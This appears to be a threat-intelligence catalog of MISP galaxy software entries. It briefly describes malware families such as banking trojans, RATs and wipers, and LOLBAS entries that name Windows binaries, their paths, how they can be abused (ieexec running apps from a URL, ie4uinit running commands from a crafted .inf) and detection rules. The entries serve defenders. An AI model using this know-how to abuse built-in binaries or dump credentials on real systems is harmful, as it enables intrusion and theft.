The tag is: misp-galaxy:software="Gpscript.exe - Associated Software"

Gpscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by group policy to process scripts

Author: Oddvar Moe

Paths: * C:\Windows\System32\gpscript.exe * C:\Windows\SysWOW64\gpscript.exe

Detection: * Sigma: [proc_creation_win_lolbin_gpscript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml) * IOC: Scripts added in local group policy * IOC: Execution of Gpscript.exe after logon<sup>[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]</sup>

The tag is: misp-galaxy:software="Gpscript"

Grandoreiro

[Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) has confirmed victims in Brazil, Mexico, Portugal, and Spain.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup><sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>

The tag is: misp-galaxy:software="Grandoreiro"

GraphicalProton

According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed a HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.<sup>[[U.S. CISA SVR TeamCity Exploits December 2023](/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]</sup>

The tag is: misp-galaxy:software="GraphicalProton"

GravityRAT

[GravityRAT](https://app.tidalcyber.com/software/08cb425d-7b7a-41dc-a897-9057ce57fea9) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. <sup>[[Talos GravityRAT](https://app.tidalcyber.com/references/2d7a1d72-cc9a-4b0b-a89a-e24ca836879b)]</sup>

The tag is: misp-galaxy:software="GravityRAT"

Green Lambert

[Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.<sup>[[Kaspersky Lamberts Toolkit April 2017](https://app.tidalcyber.com/references/2be23bfb-c6fb-455e-ae88-2ae910ccef60)]</sup><sup>[[Objective See Green Lambert for OSX Oct 2021](https://app.tidalcyber.com/references/fad94973-eafa-4fdb-b7aa-22c21d894f81)]</sup>

The tag is: misp-galaxy:software="Green Lambert"

GreyEnergy

[GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) shares similarities with the [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware and is thought to be the successor of it.<sup>[[ESET GreyEnergy Oct 2018](https://app.tidalcyber.com/references/f3e70f41-6c22-465c-b872-a7ec5e6a3e67)]</sup>

The tag is: misp-galaxy:software="GreyEnergy"

GrimAgent

The tag is: misp-galaxy:software="GrimAgent"

Grixba

Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.<sup>[[Symantec Play Ransomware April 19 2023](/references/a78613a5-ce17-4d11-8f2f-3e642cd7673c)]</sup>

The tag is: misp-galaxy:software="Grixba"

gsecdump

[gsecdump](https://app.tidalcyber.com/software/5ffe662f-9da1-4b6f-ad3a-f296383e828c) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. <sup>[[TrueSec Gsecdump](https://app.tidalcyber.com/references/ba1d07ed-2e18-4f5f-9d44-082530946f14)]</sup>

The tag is: misp-galaxy:software="gsecdump"

GuLoader

[GuLoader](https://app.tidalcyber.com/software/03e985d6-870b-4533-af13-08b1e0511444) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8), [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), FormBook, and Parallax RAT.<sup>[[Unit 42 NETWIRE April 2020](https://app.tidalcyber.com/references/b42f119d-144a-470a-b9fe-ccbf80a78fbb)]</sup><sup>[[Medium Eli Salem GuLoader April 2021](https://app.tidalcyber.com/references/87c5e84a-b96d-489d-aa10-db95b78c5a93)]</sup>

The tag is: misp-galaxy:software="GuLoader"

H1N1

[H1N1](https://app.tidalcyber.com/software/5f1602fe-a4ce-4932-9cf9-ec842f2c58f1) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. <sup>[[Cisco H1N1 Part 1](https://app.tidalcyber.com/references/03a2faca-1a47-4f68-9f26-3fa98145f2ab)]</sup>

The tag is: misp-galaxy:software="H1N1"

Hacking Team UEFI Rootkit

[Hacking Team UEFI Rootkit](https://app.tidalcyber.com/software/75db2ac3-901e-4b1f-9a0d-bac6562d57a3) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. <sup>[[TrendMicro Hacking Team UEFI](https://app.tidalcyber.com/references/24796535-d516-45e9-bcc7-8f03a3f3cd73)]</sup>

The tag is: misp-galaxy:software="Hacking Team UEFI Rootkit"

HALFBAKED

[HALFBAKED](https://app.tidalcyber.com/software/5edf0ef7-a960-4500-8a89-8c8b4fdf8824) is a malware family consisting of multiple components intended to establish persistence in victim networks. <sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

The tag is: misp-galaxy:software="HALFBAKED"

HammerDuke - Associated Software

The tag is: misp-galaxy:software="HammerDuke - Associated Software"

NetDuke - Associated Software

The tag is: misp-galaxy:software="NetDuke - Associated Software"

Chanitor - Associated Software

The tag is: misp-galaxy:software="Chanitor - Associated Software"

Hancitor

The tag is: misp-galaxy:software="Hancitor"

HAPPYWORK

[HAPPYWORK](https://app.tidalcyber.com/software/c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8) is a downloader used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target South Korean government and financial victims in November 2016. <sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup>

The tag is: misp-galaxy:software="HAPPYWORK"

HARDRAIN

[HARDRAIN](https://app.tidalcyber.com/software/ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7) is a Trojan malware variant reportedly used by the North Korean government. <sup>[[US-CERT HARDRAIN March 2018](https://app.tidalcyber.com/references/ffc17fa5-e7d3-4592-b47b-e12ced0e62a4)]</sup>

The tag is: misp-galaxy:software="HARDRAIN"

Havij

[Havij](https://app.tidalcyber.com/software/8bd36306-bd4b-4a76-8842-44acb0cedbcc) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. <sup>[[Check Point Havij Analysis](https://app.tidalcyber.com/references/2e00a539-acbe-4462-a30f-43da4e8b9c4f)]</sup>

The tag is: misp-galaxy:software="Havij"

HAWKBALL

[HAWKBALL](https://app.tidalcyber.com/software/392c5a32-53b5-4ce8-a946-226cb533cc4e) is a backdoor that was observed in targeting of the government sector in Central Asia.<sup>[[FireEye HAWKBALL Jun 2019](https://app.tidalcyber.com/references/c88150b1-8c0a-4fc5-b5b7-11e242af1c43)]</sup>

The tag is: misp-galaxy:software="HAWKBALL"

hcdLoader

The tag is: misp-galaxy:software="hcdLoader"

Custom HDoor - Associated Software

The tag is: misp-galaxy:software="Custom HDoor - Associated Software"

HDoor

The tag is: misp-galaxy:software="HDoor"

HELLOKITTY

[HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) and [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c). [HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup>

The tag is: misp-galaxy:software="HELLOKITTY"

Helminth

[Helminth](https://app.tidalcyber.com/software/d6560c81-1e7e-4d01-9814-4be4fb43e655) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. <sup>[[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)]</sup>

The tag is: misp-galaxy:software="Helminth"

DriveSlayer - Associated Software

<sup>[[Crowdstrike PartyTicket March 2022](https://app.tidalcyber.com/references/8659fea7-7d65-4ee9-8ceb-cf41204b57e0)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup>

The tag is: misp-galaxy:software="DriveSlayer - Associated Software"

Trojan.Killdisk - Associated Software

<sup>[[CISA AA22-057A Destructive Malware February 2022](https://app.tidalcyber.com/references/18684085-c156-4610-8b1f-cc9646f2c06e)]</sup><sup>[[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]</sup>

The tag is: misp-galaxy:software="Trojan.Killdisk - Associated Software"

HermeticWiper

[HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.<sup>[[SentinelOne Hermetic Wiper February 2022](https://app.tidalcyber.com/references/96825555-1936-4ee3-bb25-423dc16a9116)]</sup><sup>[[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup><sup>[[ESET Hermetic Wiper February 2022](https://app.tidalcyber.com/references/07ef66e8-195b-4afe-a518-ce9e77220038)]</sup><sup>[[Qualys Hermetic Wiper March 2022](https://app.tidalcyber.com/references/2b25969b-2f0b-4204-9277-596e80c4e626)]</sup>

The tag is: misp-galaxy:software="HermeticWiper"

HermeticWizard

[HermeticWizard](https://app.tidalcyber.com/software/36ddc8cd-8f80-489e-a702-c682936b5393) is a worm that has been used to spread [HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) in attacks against organizations in Ukraine since at least 2022.<sup>[[ESET Hermetic Wizard March 2022](https://app.tidalcyber.com/references/e0337ce9-2ca9-4877-b116-8c4d9d864df0)]</sup>

The tag is: misp-galaxy:software="HermeticWizard"

Heyoka Backdoor

[Heyoka Backdoor](https://app.tidalcyber.com/software/1841a6e8-6c23-46a1-9c81-783746083764) is a custom backdoor—​based on the Heyoka open source exfiltration tool—​that has been used by [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) since at least 2013.<sup>[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]</sup><sup>[[Sourceforge Heyoka 2022](https://app.tidalcyber.com/references/f6677391-cb7a-4abc-abb7-3a8cd47fbc90)]</sup>

The tag is: misp-galaxy:software="Heyoka Backdoor"

Hh.exe - Associated Software

<sup>[[Hh.exe - LOLBAS Project](/references/4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc)]</sup>

The tag is: misp-galaxy:software="Hh.exe - Associated Software"

Hh

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used for processing chm files in Windows

Author: Oddvar Moe

Paths: * C:\Windows\hh.exe * C:\Windows\SysWOW64\hh.exe

The tag is: misp-galaxy:software="Hh"

HiddenWasp

[HiddenWasp](https://app.tidalcyber.com/software/ec02fb9c-bf9f-404d-bc54-819f2b3fb040) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.<sup>[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]</sup>

The tag is: misp-galaxy:software="HiddenWasp"

HIDEDRV

The tag is: misp-galaxy:software="HIDEDRV"

Hikit

[Hikit](https://app.tidalcyber.com/software/8046c80c-4339-4cfb-8bfd-464801db2bfe) is malware that has been used by [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) for late-stage persistence and exfiltration after the initial compromise.<sup>[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]</sup><sup>[[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]</sup>

The tag is: misp-galaxy:software="Hikit"

Hildegard

[Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c). <sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>

The tag is: misp-galaxy:software="Hildegard"

Hi-Zor

[Hi-Zor](https://app.tidalcyber.com/software/286184d9-f28a-4d5a-a9dd-2216b3c47809) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c). It was used in a campaign named INOCNATION. <sup>[[Fidelis Hi-Zor](https://app.tidalcyber.com/references/0c9ff201-283a-4527-8cb8-6f0d05a4f724)]</sup>

The tag is: misp-galaxy:software="Hi-Zor"

HOMEFRY

[HOMEFRY](https://app.tidalcyber.com/software/16db13f2-f350-4323-96cb-c5f4ac36c3e0) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) backdoors. <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="HOMEFRY"

HOPLIGHT

[HOPLIGHT](https://app.tidalcyber.com/software/4d94594c-2224-46ca-8bc3-28b12ed139f9) is a backdoor Trojan that has reportedly been used by the North Korean government.<sup>[[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]</sup>

The tag is: misp-galaxy:software="HOPLIGHT"

HotCroissant

[HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.<sup>[[US-CERT HOTCROISSANT February 2020](https://app.tidalcyber.com/references/db5c816a-2a23-4966-8f0b-4ec86cae45c9)]</sup> [HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) shares numerous code similarities with [Rifdoor]([Carbon Black HotCroissant April 2020(https://app.tidalcyber.com/references/43bcb35b-56e1-47a8-9c74-f7543a25b2a6)]</sup>

The tag is: misp-galaxy:software="HotCroissant"

HUC Packet Transmit Tool - Associated Software

The tag is: misp-galaxy:software="HUC Packet Transmit Tool - Associated Software"

HTRAN

[HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. <sup>[[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)]</sup><sup>[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]</sup>

The tag is: misp-galaxy:software="HTRAN"

Token Control - Associated Software

The tag is: misp-galaxy:software="Token Control - Associated Software"

HttpDump - Associated Software

The tag is: misp-galaxy:software="HttpDump - Associated Software"

HTTPBrowser

[HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa) is malware that has been used by several threat groups. <sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup> <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> It is believed to be of Chinese origin. <sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup>

The tag is: misp-galaxy:software="HTTPBrowser"

httpclient

[httpclient](https://app.tidalcyber.com/software/bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="httpclient"

Roarur - Associated Software

The tag is: misp-galaxy:software="Roarur - Associated Software"

HomeUnix - Associated Software

The tag is: misp-galaxy:software="HomeUnix - Associated Software"

HydraQ - Associated Software

The tag is: misp-galaxy:software="HydraQ - Associated Software"

Aurora - Associated Software

The tag is: misp-galaxy:software="Aurora - Associated Software"

MdmBot - Associated Software

The tag is: misp-galaxy:software="MdmBot - Associated Software"

Homux - Associated Software

The tag is: misp-galaxy:software="Homux - Associated Software"

HidraQ - Associated Software

The tag is: misp-galaxy:software="HidraQ - Associated Software"

McRat - Associated Software

The tag is: misp-galaxy:software="McRat - Associated Software"

9002 RAT - Associated Software

The tag is: misp-galaxy:software="9002 RAT - Associated Software"

Hydraq

[Hydraq](https://app.tidalcyber.com/software/4ffbca79-358a-4ba5-bfbb-dc1694c45646) is a data-theft trojan first used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17]([MicroFocus 9002 Aug 2016(https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)]</sup><sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)]</sup><sup>[[ASERT Seven Pointed Dagger Aug 2015](https://app.tidalcyber.com/references/a8f323c7-82bc-46e6-bd6c-0b631abc644a)]</sup><sup>[[FireEye DeputyDog 9002 November 2013](https://app.tidalcyber.com/references/68b5a913-b696-4ca5-89ed-63453023d2a2)]</sup><sup>[[ProofPoint GoT 9002 Aug 2017](https://app.tidalcyber.com/references/b796f889-400c-440b-86b2-1588fd15f3ae)]</sup><sup>[[FireEye Sunshop Campaign May 2013](https://app.tidalcyber.com/references/ec246c7a-3396-46f9-acc4-a100cb5e5fe6)]</sup><sup>[[PaloAlto 3102 Sept 2015](https://app.tidalcyber.com/references/db340043-43a7-4b16-a570-92a0d879b2bf)]</sup>

The tag is: misp-galaxy:software="Hydraq"

HyperBro

The tag is: misp-galaxy:software="HyperBro"

IceApple

[IceApple](https://app.tidalcyber.com/software/5a73defd-6a1a-4132-8427-cec649e8267a) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.<sup>[[CrowdStrike IceApple May 2022](https://app.tidalcyber.com/references/325988b8-1c7d-4296-83d6-bfcbe533b75e)]</sup>

The tag is: misp-galaxy:software="IceApple"

IcedID

[IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) has been downloaded by [Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) in multiple campaigns.<sup>[[IBM IcedID November 2017](https://app.tidalcyber.com/references/fdc56361-24f4-4fa5-949e-02e61c4d3be8)]</sup><sup>[[Juniper IcedID June 2020](https://app.tidalcyber.com/references/426886d0-cdf2-4af7-a0e4-366c1b0a1942)]</sup>

The tag is: misp-galaxy:software="IcedID"

Ie4uinit.exe - Associated Software

<sup>[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]</sup>

The tag is: misp-galaxy:software="Ie4uinit.exe - Associated Software"

Ie4uinit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Executes commands from a specially prepared ie4uinit.inf file.

Author: Oddvar Moe

Paths: * c:\windows\system32\ie4uinit.exe * c:\windows\sysWOW64\ie4uinit.exe * c:\windows\system32\ieuinit.inf * c:\windows\sysWOW64\ieuinit.inf

Detection: * IOC: ie4uinit.exe copied outside of %windir% * IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% * Sigma: [proc_creation_win_lolbin_ie4uinit.yml]([Ie4uinit.exe - LOLBAS Project(/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]</sup>

The tag is: misp-galaxy:software="Ie4uinit"

Ieadvpack.dll - Associated Software

<sup>[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]</sup>

The tag is: misp-galaxy:software="Ieadvpack.dll - Associated Software"

Ieadvpack

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.

Author: LOLBAS Team

Paths: * c:\windows\system32\ieadvpack.dll * c:\windows\syswow64\ieadvpack.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: [detect_rundll32_application_control_bypass_advpack.yml]([Ieadvpack.dll - LOLBAS Project(/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]</sup>

The tag is: misp-galaxy:software="Ieadvpack"

iediagcmd.exe - Associated Software

<sup>[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]</sup>

The tag is: misp-galaxy:software="iediagcmd.exe - Associated Software"

iediagcmd

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Diagnostics Utility for Internet Explorer

Author: manasmbellani

Paths: * C:\Program Files\Internet Explorer\iediagcmd.exe

Detection: * Sigma: [https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml](https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml) * IOC: Sysmon Event ID 1 * IOC: Execution of process iediagcmd.exe with /out could be suspicious<sup>[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]</sup>

The tag is: misp-galaxy:software="iediagcmd"

Ieexec.exe - Associated Software

<sup>[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]</sup>

The tag is: misp-galaxy:software="Ieexec.exe - Associated Software"

Ieexec

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

Detection: * Sigma: [proc_creation_win_lolbin_ieexec_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml) * Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml) * Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml) * IOC: Network connections originating from ieexec.exe may be suspicious<sup>[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]</sup>

The tag is: misp-galaxy:software="Ieexec"

Ieframe.dll - Associated Software

<sup>[[Ieframe.dll - LOLBAS Project](/references/aab9c80d-1f1e-47ba-954d-65e7400054df)]</sup>

The tag is: misp-galaxy:software="Ieframe.dll - Associated Software"

ifconfig

[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. <sup>[[Wikipedia Ifconfig](https://app.tidalcyber.com/references/7bb238d4-4571-4cd0-aab2-76797570724a)]</sup>

The tag is: misp-galaxy:software="ifconfig"

OSX/MacDownloader - Associated Software

The tag is: misp-galaxy:software="OSX/MacDownloader - Associated Software"

iKitten

The tag is: misp-galaxy:software="iKitten"

Ilasm.exe - Associated Software

<sup>[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]</sup>

The tag is: misp-galaxy:software="Ilasm.exe - Associated Software"

Ilasm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: used for compile c# code into dll or exe.

Author: Hai vaknin (lux)

Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

Detection: * IOC: Ilasm may not be used often in production environments (such as on endpoints) * Sigma: [proc_creation_win_lolbin_ilasm.yml]([Ilasm.exe - LOLBAS Project(/references/347a1f01-02ce-488e-9100-862971c1833f)]</sup>

The tag is: misp-galaxy:software="Ilasm"

IMEWDBLD.exe - Associated Software

<sup>[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]</sup>

The tag is: misp-galaxy:software="IMEWDBLD.exe - Associated Software"

IMEWDBLD

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft IME Open Extended Dictionary Module

Author: Wade Hickey

Paths: * C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

Detection: * Sigma: [net_connection_win_imewdbld.yml]([IMEWDBLD.exe - LOLBAS Project(/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]</sup>

